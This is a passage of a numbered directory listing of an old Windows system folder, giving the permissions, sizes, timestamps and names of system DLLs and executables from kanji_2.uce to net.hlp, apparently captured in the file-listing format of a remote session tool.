  1275. 100666/rw-rw-rw- 8484 fil 2002-12-31 07:00:00 -0500 kanji_2.uce
  1276. 100777/rwxrwxrwx 14710 fil 2002-12-31 07:00:00 -0500 kb16.com
  1277. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdbe.dll
  1278. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdbene.dll
  1279. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdbr.dll
  1280. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdca.dll
  1281. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 kbdcan.dll
  1282. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdda.dll
  1283. 100666/rw-rw-rw- 5904 fil 2002-12-31 07:00:00 -0500 kbddv.dll
  1284. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdes.dll
  1285. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 kbdfc.dll
  1286. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdfi.dll
  1287. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdfo.dll
  1288. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdfr.dll
  1289. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbdgae.dll
  1290. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdgr.dll
  1291. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdgr1.dll
  1292. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdic.dll
  1293. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbdir.dll
  1294. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbdit.dll
  1295. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbdit142.dll
  1296. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdla.dll
  1297. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbdmac.dll
  1298. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdne.dll
  1299. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdno.dll
  1300. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdpo.dll
  1301. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdsf.dll
  1302. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 kbdsg.dll
  1303. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdsp.dll
  1304. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdsw.dll
  1305. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbduk.dll
  1306. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbdus.dll
  1307. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbdusl.dll
  1308. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 kbdusr.dll
  1309. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 kbdusx.dll
  1310. 100666/rw-rw-rw- 148240 fil 2002-12-31 07:00:00 -0500 kdcsvc.dll
  1311. 100666/rw-rw-rw- 212752 fil 2002-12-31 07:00:00 -0500 kerberos.dll
  1312. 100666/rw-rw-rw- 743184 fil 2002-12-31 07:00:00 -0500 kernel32.dll
  1313. 100666/rw-rw-rw- 42809 fil 2002-12-31 07:00:00 -0500 key01.sys
  1314. 100666/rw-rw-rw- 2000 fil 2002-12-31 07:00:00 -0500 keyboard.drv
  1315. 100666/rw-rw-rw- 42537 fil 2002-12-31 07:00:00 -0500 keyboard.sys
  1316. 100666/rw-rw-rw- 18192 fil 2002-12-31 07:00:00 -0500 kmddsp.tsp
  1317. 100666/rw-rw-rw- 12876 fil 2002-12-31 07:00:00 -0500 korean.uce
  1318. 100777/rwxrwxrwx 92032 fil 2002-12-31 07:00:00 -0500 krnl386.exe
  1319. 100666/rw-rw-rw- 7440 fil 1999-12-02 17:31:06 -0500 ksclockf.ax
  1320. 100666/rw-rw-rw- 6928 fil 1999-12-02 17:30:20 -0500 ksdata.ax
  1321. 100666/rw-rw-rw- 7952 fil 1999-12-02 17:30:20 -0500 ksinterf.ax
  1322. 100666/rw-rw-rw- 103696 fil 1999-12-02 17:30:20 -0500 ksproxy.ax
  1323. 100666/rw-rw-rw- 7952 fil 2002-12-31 07:00:00 -0500 ksqmf.ax
  1324. 100666/rw-rw-rw- 4880 fil 1999-12-01 01:39:14 -0500 ksuser.dll
  1325. 100666/rw-rw-rw- 10000 fil 1999-12-02 17:31:06 -0500 ksvpintf.ax
  1326. 100666/rw-rw-rw- 83456 fil 2002-12-31 07:00:00 -0500 l3codecx.ax
  1327. 100666/rw-rw-rw- 168 fil 2002-12-31 07:00:00 -0500 l_except.nls
  1328. 100666/rw-rw-rw- 7046 fil 2002-12-31 07:00:00 -0500 l_intl.nls
  1329. 100777/rwxrwxrwx 11024 fil 2002-12-31 07:00:00 -0500 label.exe
  1330. 100666/rw-rw-rw- 221600 fil 2002-12-31 07:00:00 -0500 lanman.drv
  1331. 100777/rwxrwxrwx 69904 fil 2002-12-31 07:00:00 -0500 lcwiz.exe
  1332. 100777/rwxrwxrwx 62224 fil 2002-12-31 07:00:00 -0500 ldifde.exe
  1333. 100666/rw-rw-rw- 4699 fil 2002-12-31 07:00:00 -0500 legacy.inf
  1334. 100666/rw-rw-rw- 34064 fil 2002-12-31 07:00:00 -0500 lhacm.acm
  1335. 100666/rw-rw-rw- 53520 fil 2002-12-31 07:00:00 -0500 liccpa.cpl
  1336. 100666/rw-rw-rw- 21264 fil 2002-12-31 07:00:00 -0500 licmgr10.dll
  1337. 100777/rwxrwxrwx 30480 fil 2002-12-31 07:00:00 -0500 lights.exe
  1338. 100666/rw-rw-rw- 16144 fil 2002-12-31 07:00:00 -0500 linkinfo.dll
  1339. 100777/rwxrwxrwx 168720 fil 2002-12-31 07:00:00 -0500 llsmgr.exe
  1340. 100666/rw-rw-rw- 48912 fil 2002-12-31 07:00:00 -0500 llsrpc.dll
  1341. 100777/rwxrwxrwx 83728 fil 2002-12-31 07:00:00 -0500 llssrv.exe
  1342. 100666/rw-rw-rw- 10000 fil 2002-12-31 07:00:00 -0500 lmhsvc.dll
  1343. 100666/rw-rw-rw- 337680 fil 2002-12-31 07:00:00 -0500 lmrt.dll
  1344. 100777/rwxrwxrwx 20752 fil 2002-12-31 07:00:00 -0500 lnkstub.exe
  1345. 100777/rwxrwxrwx 1131 fil 2002-12-31 07:00:00 -0500 loadfix.com
  1346. 100666/rw-rw-rw- 66320 fil 2002-12-31 07:00:00 -0500 loadperf.dll
  1347. 100666/rw-rw-rw- 192234 fil 2002-12-31 07:00:00 -0500 locale.nls
  1348. 100666/rw-rw-rw- 4368 fil 2002-12-31 07:00:00 -0500 localmon.dll
  1349. 100666/rw-rw-rw- 246032 fil 2002-12-31 07:00:00 -0500 localsec.dll
  1350. 100666/rw-rw-rw- 259344 fil 2002-12-31 07:00:00 -0500 localspl.dll
  1351. 100666/rw-rw-rw- 9488 fil 2002-12-31 07:00:00 -0500 localui.dll
  1352. 100777/rwxrwxrwx 72464 fil 2002-12-31 07:00:00 -0500 locator.exe
  1353. 100777/rwxrwxrwx 25872 fil 2002-12-31 07:00:00 -0500 lodctr.exe
  1354. 100666/rw-rw-rw- 204863 fil 2002-12-31 07:00:00 -0500 logdrive.dll
  1355. 100666/rw-rw-rw- 48400 fil 2002-12-31 07:00:00 -0500 loghours.dll
  1356. 100777/rwxrwxrwx 486 fil 2002-12-31 07:00:00 -0500 login.cmd
  1357. 100777/rwxrwxrwx 16656 fil 2002-12-31 07:00:00 -0500 logoff.exe
  1358. 100666/rw-rw-rw- 130832 fil 2002-12-31 07:00:00 -0500 logon.scr
  1359. 100666/rw-rw-rw- 20240 fil 2002-12-31 07:00:00 -0500 lpk.dll
  1360. 100777/rwxrwxrwx 6928 fil 2002-12-31 07:00:00 -0500 lpq.exe
  1361. 100777/rwxrwxrwx 8976 fil 2002-12-31 07:00:00 -0500 lpr.exe
  1362. 100666/rw-rw-rw- 10000 fil 2002-12-31 07:00:00 -0500 lprhelp.dll
  1363. 100666/rw-rw-rw- 10000 fil 2002-12-31 07:00:00 -0500 lprmonui.dll
  1364. 100666/rw-rw-rw- 518928 fil 2002-12-31 07:00:00 -0500 lsasrv.dll
  1365. 100777/rwxrwxrwx 33552 fil 2002-12-31 07:00:00 -0500 lsass.exe
  1366. 100666/rw-rw-rw- 52736 fil 2002-12-31 07:00:00 -0500 lusrmgr.msc
  1367. 100666/rw-rw-rw- 10000 fil 2002-12-31 07:00:00 -0500 lz32.dll
  1368. 100666/rw-rw-rw- 9936 fil 2002-12-31 07:00:00 -0500 lzexpand.dll
  1369. 100666/rw-rw-rw- 4512 fil 2002-12-31 07:00:00 -0500 mac8021x.ldf
  1370. 100777/rwxrwxrwx 71952 fil 2002-12-31 07:00:00 -0500 macfile.exe
  1371. 100666/rw-rw-rw- 8976 fil 2002-12-31 07:00:00 -0500 mag_hook.dll
  1372. 100777/rwxrwxrwx 43792 fil 2002-12-31 07:00:00 -0500 magnify.exe
  1373. 100666/rw-rw-rw- 122128 fil 2002-12-31 07:00:00 -0500 main.cpl
  1374. 100777/rwxrwxrwx 81168 fil 2002-12-31 07:00:00 -0500 makecab.exe
  1375. 100666/rw-rw-rw- 131072 fil 2002-12-31 07:00:00 -0500 mapi32.dll
  1376. 100666/rw-rw-rw- 131072 fil 2002-12-31 07:00:00 -0500 mapistub.dll
  1377. 100666/rw-rw-rw- 535 fil 2017-05-25 06:13:53 -0400 mapisvc.inf
  1378. 100666/rw-rw-rw- 30480 fil 2002-12-31 07:00:00 -0500 mbslgn32.dll
  1379. 100666/rw-rw-rw- 13584 fil 2002-12-31 07:00:00 -0500 mcastmib.dll
  1380. 100666/rw-rw-rw- 11024 fil 2002-12-31 07:00:00 -0500 mcd32.dll
  1381. 100666/rw-rw-rw- 10688 fil 2002-12-31 07:00:00 -0500 mcdsrv32.dll
  1382. 100666/rw-rw-rw- 73376 fil 2002-12-31 07:00:00 -0500 mciavi.drv
  1383. 100666/rw-rw-rw- 82192 fil 2002-12-31 07:00:00 -0500 mciavi32.dll
  1384. 100666/rw-rw-rw- 18192 fil 2002-12-31 07:00:00 -0500 mcicda.dll
  1385. 100666/rw-rw-rw- 8192 fil 2002-12-31 07:00:00 -0500 mciole16.dll
  1386. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 mciole32.dll
  1387. 100666/rw-rw-rw- 34576 fil 2002-12-31 07:00:00 -0500 mciqtz32.dll
  1388. 100666/rw-rw-rw- 22288 fil 2002-12-31 07:00:00 -0500 mciseq.dll
  1389. 100666/rw-rw-rw- 25264 fil 2002-12-31 07:00:00 -0500 mciseq.drv
  1390. 100666/rw-rw-rw- 23312 fil 2002-12-31 07:00:00 -0500 mciwave.dll
  1391. 100666/rw-rw-rw- 28160 fil 2002-12-31 07:00:00 -0500 mciwave.drv
  1392. 100666/rw-rw-rw- 76048 fil 2002-12-31 07:00:00 -0500 mdhcp.dll
  1393. 100777/rwxrwxrwx 124200 fil 1999-02-28 04:32:52 -0500 mdm.exe
  1394. 100666/rw-rw-rw- 102160 fil 2002-12-31 07:00:00 -0500 mdminst.dll
  1395. 100777/rwxrwxrwx 39386 fil 2002-12-31 07:00:00 -0500 mem.exe
  1396. 100666/rw-rw-rw- 35600 fil 2002-12-31 07:00:00 -0500 mf3216.dll
  1397. 100666/rw-rw-rw- 924432 fil 2002-12-31 07:00:00 -0500 mfc40.dll
  1398. 100666/rw-rw-rw- 924432 fil 2002-12-31 07:00:00 -0500 mfc40u.dll
  1399. 100666/rw-rw-rw- 1015859 fil 2002-12-31 07:00:00 -0500 mfc42.dll
  1400. 100666/rw-rw-rw- 1011764 fil 2002-12-31 07:00:00 -0500 mfc42u.dll
  1401. 100666/rw-rw-rw- 26896 fil 2002-12-31 07:00:00 -0500 mfcsubs.dll
  1402. 100666/rw-rw-rw- 14096 fil 2002-12-31 07:00:00 -0500 mgmtapi.dll
  1403. 100666/rw-rw-rw- 46258 fil 2002-12-31 07:00:00 -0500 mib.bin
  1404. 100666/rw-rw-rw- 1 fil 2002-12-31 07:00:00 -0500 midimap.cfg
  1405. 100666/rw-rw-rw- 19216 fil 2002-12-31 07:00:00 -0500 midimap.dll
  1406. 100777/rwxrwxrwx 21264 fil 2002-12-31 07:00:00 -0500 migpwd.exe
  1407. 100666/rw-rw-rw- 19728 fil 2002-12-31 07:00:00 -0500 mimefilt.dll
  1408. 100666/rw-rw-rw- 673088 fil 2002-12-31 07:00:00 -0500 mlang.dat
  1409. 100666/rw-rw-rw- 523024 fil 2002-12-31 07:00:00 -0500 mlang.dll
  1410. 100666/rw-rw-rw- 4368 fil 2002-12-31 07:00:00 -0500 mll_hp.dll
  1411. 100666/rw-rw-rw- 8976 fil 2002-12-31 07:00:00 -0500 mll_mtf.dll
  1412. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 mll_qic.dll
  1413. 100777/rwxrwxrwx 603408 fil 2002-12-31 07:00:00 -0500 mmc.exe
  1414. 100666/rw-rw-rw- 835856 fil 2002-12-31 07:00:00 -0500 mmcndmgr.dll
  1415. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 mmcshext.dll
  1416. 100666/rw-rw-rw- 31504 fil 2002-12-31 07:00:00 -0500 mmdet.dll
  1417. 100666/rw-rw-rw- 1840 fil 2002-12-31 07:00:00 -0500 mmdriver.inf
  1418. 100666/rw-rw-rw- 12048 fil 2002-12-31 07:00:00 -0500 mmdrv.dll
  1419. 100666/rw-rw-rw- 155920 fil 2002-12-31 07:00:00 -0500 mmefxe.ocx
  1420. 100666/rw-rw-rw- 32829 fil 2002-12-31 07:00:00 -0500 mmfutil.dll
  1421. 100666/rw-rw-rw- 303888 fil 2002-12-31 07:00:00 -0500 mmsys.cpl
  1422. 100666/rw-rw-rw- 68624 fil 2002-12-31 07:00:00 -0500 mmsystem.dll
  1423. 100666/rw-rw-rw- 1152 fil 2002-12-31 07:00:00 -0500 mmtask.tsk
  1424. 100666/rw-rw-rw- 119056 fil 2002-12-31 07:00:00 -0500 mmutilse.dll
  1425. 100666/rw-rw-rw- 32880 fil 2002-12-31 07:00:00 -0500 mnmdd.dll
  1426. 100777/rwxrwxrwx 21776 fil 2002-12-31 07:00:00 -0500 mnmsrvc.exe
  1427. 100666/rw-rw-rw- 169232 fil 2002-12-31 07:00:00 -0500 mobsync.dll
  1428. 100777/rwxrwxrwx 111376 fil 2002-12-31 07:00:00 -0500 mobsync.exe
  1429. 100777/rwxrwxrwx 20752 fil 2002-12-31 07:00:00 -0500 mode.com
  1430. 100666/rw-rw-rw- 99088 fil 2002-12-31 07:00:00 -0500 modemui.dll
  1431. 100666/rw-rw-rw- 10032 fil 2002-12-31 07:00:00 -0500 modex.dll
  1432. 100777/rwxrwxrwx 16656 fil 2002-12-31 07:00:00 -0500 more.com
  1433. 100666/rw-rw-rw- 134144 fil 2002-12-31 07:00:00 -0500 moricons.dll
  1434. 100777/rwxrwxrwx 7952 fil 2002-12-31 07:00:00 -0500 mountvol.exe
  1435. 100666/rw-rw-rw- 2032 fil 2002-12-31 07:00:00 -0500 mouse.drv
  1436. 100666/rw-rw-rw- 63760 fil 2002-12-31 07:00:00 -0500 mpg2splt.ax
  1437. 100666/rw-rw-rw- 239888 fil 2002-12-31 07:00:00 -0500 mpg4ds32.ax
  1438. 100777/rwxrwxrwx 118032 fil 2002-12-31 07:00:00 -0500 mplay32.exe
  1439. 100777/rwxrwxrwx 28432 fil 2002-12-31 07:00:00 -0500 mpnotify.exe
  1440. 100666/rw-rw-rw- 55056 fil 2002-12-31 07:00:00 -0500 mpr.dll
  1441. 100666/rw-rw-rw- 81168 fil 2002-12-31 07:00:00 -0500 mprapi.dll
  1442. 100666/rw-rw-rw- 69904 fil 2002-12-31 07:00:00 -0500 mprddm.dll
  1443. 100666/rw-rw-rw- 47376 fil 2002-12-31 07:00:00 -0500 mprdim.dll
  1444. 100666/rw-rw-rw- 100112 fil 2002-12-31 07:00:00 -0500 mprmsg.dll
  1445. 100666/rw-rw-rw- 964368 fil 2002-12-31 07:00:00 -0500 mprsnap.dll
  1446. 100666/rw-rw-rw- 56080 fil 2002-12-31 07:00:00 -0500 mprui.dll
  1447. 100777/rwxrwxrwx 13584 fil 2002-12-31 07:00:00 -0500 mrinfo.exe
  1448. 100666/rw-rw-rw- 61168 fil 2002-12-31 07:00:00 -0500 msacm.dll
  1449. 100666/rw-rw-rw- 66832 fil 2002-12-31 07:00:00 -0500 msacm32.dll
  1450. 100666/rw-rw-rw- 21264 fil 2002-12-31 07:00:00 -0500 msacm32.drv
  1451. 100666/rw-rw-rw- 210704 fil 2002-12-31 07:00:00 -0500 msadds32.ax
  1452. 100666/rw-rw-rw- 15120 fil 2002-12-31 07:00:00 -0500 msadp32.acm
  1453. 100666/rw-rw-rw- 108816 fil 2002-12-31 07:00:00 -0500 msafd.dll
  1454. 100666/rw-rw-rw- 80128 fil 2002-12-31 07:00:00 -0500 msapsspc.dll
  1455. 100666/rw-rw-rw- 53008 fil 2002-12-31 07:00:00 -0500 msasn1.dll
  1456. 100666/rw-rw-rw- 50448 fil 2002-12-31 07:00:00 -0500 msaudite.dll
  1457. 100666/rw-rw-rw- 7952 fil 2002-12-31 07:00:00 -0500 mscat32.dll
  1458. 100777/rwxrwxrwx 917 fil 2002-12-31 07:00:00 -0500 mscdexnt.exe
  1459. 100666/rw-rw-rw- 236304 fil 2002-12-31 07:00:00 -0500 msclus.dll
  1460. 100666/rw-rw-rw- 69904 fil 2002-12-31 07:00:00 -0500 mscms.dll
  1461. 100666/rw-rw-rw- 53520 fil 2002-12-31 07:00:00 -0500 msconf.dll
  1462. 100666/rw-rw-rw- 13824 fil 2002-12-31 07:00:00 -0500 mscpxl32.dLL
  1463. 100666/rw-rw-rw- 24848 fil 2002-12-31 07:00:00 -0500 msdart32.dll
  1464. 100666/rw-rw-rw- 12288 fil 2002-12-31 07:00:00 -0500 msdatsrc.tlb
  1465. 100666/rw-rw-rw- 69120 fil 1999-02-28 04:31:26 -0500 msdbg.dll
  1466. 100777/rwxrwxrwx 6928 fil 2002-12-31 07:00:00 -0500 msdtc.exe
  1467. 100666/rw-rw-rw- 88848 fil 2002-12-31 07:00:00 -0500 msdtclog.dll
  1468. 100666/rw-rw-rw- 768 fil 2002-12-31 07:00:00 -0500 msdtcprf.h
  1469. 100666/rw-rw-rw- 1931 fil 2002-12-31 07:00:00 -0500 msdtcprf.ini
  1470. 100666/rw-rw-rw- 707344 fil 2002-12-31 07:00:00 -0500 msdtcprx.dll
  1471. 100666/rw-rw-rw- 1131280 fil 2002-12-31 07:00:00 -0500 msdtctm.dll
  1472. 100666/rw-rw-rw- 146192 fil 2002-12-31 07:00:00 -0500 msdtcui.dll
  1473. 100666/rw-rw-rw- 842268 fil 2002-12-31 07:00:00 -0500 msdxm.ocx
  1474. 100666/rw-rw-rw- 4126 fil 2002-12-31 07:00:00 -0500 msdxmlc.dll
  1475. 100666/rw-rw-rw- 94480 fil 2002-12-31 07:00:00 -0500 msencode.dll
  1476. 100666/rw-rw-rw- 512272 fil 2002-12-31 07:00:00 -0500 msexch40.dll
  1477. 100666/rw-rw-rw- 319760 fil 2002-12-31 07:00:00 -0500 msexcl40.dll
  1478. 100666/rw-rw-rw- 18192 fil 2002-12-31 07:00:00 -0500 msfaxmon.dll
  1479. 100777/rwxrwxrwx 21776 fil 2002-12-31 07:00:00 -0500 msg.exe
  1480. 100666/rw-rw-rw- 10512 fil 2002-12-31 07:00:00 -0500 msg711.acm
  1481. 100666/rw-rw-rw- 109328 fil 2002-12-31 07:00:00 -0500 msg723.acm
  1482. 100666/rw-rw-rw- 334096 fil 2002-12-31 07:00:00 -0500 msgina.dll
  1483. 100666/rw-rw-rw- 22800 fil 2002-12-31 07:00:00 -0500 msgsm32.acm
  1484. 100666/rw-rw-rw- 35600 fil 2002-12-31 07:00:00 -0500 msgsvc.dll
  1485. 100666/rw-rw-rw- 167696 fil 2002-12-31 07:00:00 -0500 msh261.drv
  1486. 100666/rw-rw-rw- 258320 fil 1999-12-02 17:30:16 -0500 msh263.drv
  1487. 100777/rwxrwxrwx 29968 fil 2002-12-31 07:00:00 -0500 mshta.exe
  1488. 100666/rw-rw-rw- 2353936 fil 2002-12-31 07:00:00 -0500 mshtml.dll
  1489. 100666/rw-rw-rw- 1049088 fil 2002-12-31 07:00:00 -0500 mshtml.tlb
  1490. 100666/rw-rw-rw- 235280 fil 2002-12-31 07:00:00 -0500 mshtmled.dll
  1491. 100666/rw-rw-rw- 58368 fil 2002-12-31 07:00:00 -0500 mshtmler.dll
  1492. 100666/rw-rw-rw- 2017792 fil 2002-12-31 07:00:00 -0500 msi.dll
  1493. 100666/rw-rw-rw- 38672 fil 2002-12-31 07:00:00 -0500 msident.dll
  1494. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 msidle.dll
  1495. 100666/rw-rw-rw- 64272 fil 2002-12-31 07:00:00 -0500 msidlpm.dll
  1496. 100666/rw-rw-rw- 14848 fil 2002-12-31 07:00:00 -0500 msidntld.dll
  1497. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 msidpe.dll
  1498. 100666/rw-rw-rw- 246544 fil 2002-12-31 07:00:00 -0500 msieftp.dll
  1499. 100777/rwxrwxrwx 64512 fil 2002-12-31 07:00:00 -0500 msiexec.exe
  1500. 100666/rw-rw-rw- 305664 fil 2002-12-31 07:00:00 -0500 msihnd.dll
  1501. 100666/rw-rw-rw- 5392 fil 2002-12-31 07:00:00 -0500 msimg32.dll
  1502. 100666/rw-rw-rw- 847872 fil 2002-12-31 07:00:00 -0500 msimsg.dll
  1503. 100777/rwxrwxrwx 34816 fil 2002-12-31 07:00:00 -0500 msiregmv.exe
  1504. 100666/rw-rw-rw- 39936 fil 2002-12-31 07:00:00 -0500 msisip.dll
  1505. 100666/rw-rw-rw- 1507600 fil 2002-12-31 07:00:00 -0500 msjet40.dll
  1506. 100666/rw-rw-rw- 348432 fil 2002-12-31 07:00:00 -0500 msjetoledb40.dll
  1507. 100666/rw-rw-rw- 151824 fil 2002-12-31 07:00:00 -0500 msjint40.dll
  1508. 100666/rw-rw-rw- 53520 fil 2002-12-31 07:00:00 -0500 msjter40.dll
  1509. 100666/rw-rw-rw- 241936 fil 2002-12-31 07:00:00 -0500 msjtes40.dll
  1510. 100666/rw-rw-rw- 148752 fil 2002-12-31 07:00:00 -0500 msls31.dll
  1511. 100666/rw-rw-rw- 213264 fil 2002-12-31 07:00:00 -0500 msltus40.dll
  1512. 100666/rw-rw-rw- 116272 fil 2002-12-31 07:00:00 -0500 msnsspc.dll
  1513. 100666/rw-rw-rw- 16384 fil 2002-12-31 07:00:00 -0500 msobjs.dll
  1514. 100666/rw-rw-rw- 183056 fil 2002-12-31 07:00:00 -0500 msoeacct.dll
  1515. 100666/rw-rw-rw- 68368 fil 2002-12-31 07:00:00 -0500 msoert2.dll
  1516. 100666/rw-rw-rw- 155920 fil 2002-12-31 07:00:00 -0500 msorcl32.dll
  1517. 100777/rwxrwxrwx 319760 fil 2002-12-31 07:00:00 -0500 mspaint.exe
  1518. 100666/rw-rw-rw- 27136 fil 2002-12-31 07:00:00 -0500 mspatcha.dll
  1519. 100666/rw-rw-rw- 348432 fil 2002-12-31 07:00:00 -0500 mspbde40.dll
  1520. 100666/rw-rw-rw- 39696 fil 2002-12-31 07:00:00 -0500 msports.dll
  1521. 100666/rw-rw-rw- 47104 fil 2002-12-31 07:00:00 -0500 msprivs.dll
  1522. 100666/rw-rw-rw- 69632 fil 2002-12-31 07:00:00 -0500 msr2c.dll
  1523. 100666/rw-rw-rw- 7168 fil 2002-12-31 07:00:00 -0500 msr2cenu.dll
  1524. 100666/rw-rw-rw- 149264 fil 2002-12-31 07:00:00 -0500 msrating.dll
  1525. 100666/rw-rw-rw- 74000 fil 2002-12-31 07:00:00 -0500 msrclr40.dll
  1526. 100666/rw-rw-rw- 422160 fil 2002-12-31 07:00:00 -0500 msrd2x40.dll
  1527. 100666/rw-rw-rw- 315664 fil 2002-12-31 07:00:00 -0500 msrd3x40.dll
  1528. 100666/rw-rw-rw- 28944 fil 2002-12-31 07:00:00 -0500 msrecr40.dll
  1529. 100666/rw-rw-rw- 553232 fil 2002-12-31 07:00:00 -0500 msrepl40.dll
  1530. 100666/rw-rw-rw- 11024 fil 2002-12-31 07:00:00 -0500 msrle32.dll
  1531. 100666/rw-rw-rw- 106547 fil 2002-12-31 07:00:00 -0500 msscript.ocx
  1532. 100666/rw-rw-rw- 35088 fil 2002-12-31 07:00:00 -0500 mssign32.dll
  1533. 100666/rw-rw-rw- 5904 fil 2002-12-31 07:00:00 -0500 mssip32.dll
  1534. 100666/rw-rw-rw- 14608 fil 2002-12-31 07:00:00 -0500 msswch.dll
  1535. 100777/rwxrwxrwx 7440 fil 2002-12-31 07:00:00 -0500 msswchx.exe
  1536. 100666/rw-rw-rw- 216848 fil 2002-12-31 07:00:00 -0500 mstask.dll
  1537. 100777/rwxrwxrwx 119568 fil 2002-12-31 07:00:00 -0500 mstask.exe
  1538. 100666/rw-rw-rw- 258320 fil 2002-12-31 07:00:00 -0500 mstext40.dll
  1539. 100777/rwxrwxrwx 10000 fil 2002-12-31 07:00:00 -0500 mstinit.exe
  1540. 100666/rw-rw-rw- 26384 fil 2002-12-31 07:00:00 -0500 mstlsapi.dll
  1541. 100666/rw-rw-rw- 117520 fil 2002-12-31 07:00:00 -0500 msv1_0.dll
  1542. 100666/rw-rw-rw- 1355776 fil 2002-12-31 07:00:00 -0500 msvbvm50.dll
  1543. 100666/rw-rw-rw- 1385744 fil 2002-12-31 07:00:00 -0500 msvbvm60.dll
  1544. 100666/rw-rw-rw- 77878 fil 2002-12-31 07:00:00 -0500 msvcirt.dll
  1545. 100666/rw-rw-rw- 565760 fil 2002-12-31 07:00:00 -0500 msvcp50.dll
  1546. 100666/rw-rw-rw- 286773 fil 2002-12-31 07:00:00 -0500 msvcrt.dll
  1547. 100666/rw-rw-rw- 253952 fil 2002-12-31 07:00:00 -0500 msvcrt20.dll
  1548. 100666/rw-rw-rw- 65024 fil 2002-12-31 07:00:00 -0500 msvcrt40.dll
  1549. 100666/rw-rw-rw- 116496 fil 2002-12-31 07:00:00 -0500 msvfw32.dll
  1550. 100666/rw-rw-rw- 27920 fil 2002-12-31 07:00:00 -0500 msvidc32.dll
  1551. 100666/rw-rw-rw- 126912 fil 2002-12-31 07:00:00 -0500 msvideo.dll
  1552. 100666/rw-rw-rw- 76560 fil 2002-12-31 07:00:00 -0500 msw3prt.dll
  1553. 100666/rw-rw-rw- 831760 fil 2002-12-31 07:00:00 -0500 mswdat10.dll
  1554. 100666/rw-rw-rw- 64272 fil 2002-12-31 07:00:00 -0500 mswsock.dll
  1555. 100666/rw-rw-rw- 614672 fil 2002-12-31 07:00:00 -0500 mswstr10.dll
  1556. 100666/rw-rw-rw- 348432 fil 2002-12-31 07:00:00 -0500 msxbde40.dll
  1557. 100666/rw-rw-rw- 514320 fil 2002-12-31 07:00:00 -0500 msxml.dll
  1558. 100666/rw-rw-rw- 26624 fil 2002-12-31 07:00:00 -0500 msxmlr.dll
  1559. 100666/rw-rw-rw- 52496 fil 2002-12-31 07:00:00 -0500 mtxclu.dll
  1560. 100666/rw-rw-rw- 23312 fil 2002-12-31 07:00:00 -0500 mtxdm.dll
  1561. 100666/rw-rw-rw- 3856 fil 2002-12-31 07:00:00 -0500 mtxex.dll
  1562. 100666/rw-rw-rw- 30480 fil 2002-12-31 07:00:00 -0500 mtxlegih.dll
  1563. 100666/rw-rw-rw- 105744 fil 2002-12-31 07:00:00 -0500 mtxoci.dll
  1564. 40777/rwxrwxrwx 0 dir 2017-05-24 22:48:13 -0400 mui
  1565. 100666/rw-rw-rw- 110352 fil 2002-12-31 07:00:00 -0500 mycomput.dll
  1566. 100666/rw-rw-rw- 57104 fil 2002-12-31 07:00:00 -0500 mydocs.dll
  1567. 100666/rw-rw-rw- 2048 fil 2002-12-31 07:00:00 -0500 n2k.bmp
  1568. 100666/rw-rw-rw- 363280 fil 2002-12-31 07:00:00 -0500 napmmc.dll
  1569. 100777/rwxrwxrwx 24848 fil 2002-12-31 07:00:00 -0500 narrator.exe
  1570. 100666/rw-rw-rw- 75024 fil 2002-12-31 07:00:00 -0500 narrhook.dll
  1571. 100777/rwxrwxrwx 20752 fil 2002-12-31 07:00:00 -0500 nbtstat.exe
  1572. 100666/rw-rw-rw- 17168 fil 2002-12-31 07:00:00 -0500 ncpa.cpl
  1573. 100666/rw-rw-rw- 16144 fil 2002-12-31 07:00:00 -0500 nddeapi.dll
  1574. 100777/rwxrwxrwx 4880 fil 2002-12-31 07:00:00 -0500 nddeapir.exe
  1575. 100666/rw-rw-rw- 17168 fil 2002-12-31 07:00:00 -0500 nddenb32.dll
  1576. 100666/rw-rw-rw- 39184 fil 2002-12-31 07:00:00 -0500 ndptsp.tsp
  1577. 100777/rwxrwxrwx 42768 fil 2002-12-31 07:00:00 -0500 net.exe
  1578. 100666/rw-rw-rw- 113602 fil 2002-12-31 07:00:00 -0500 net.hlp
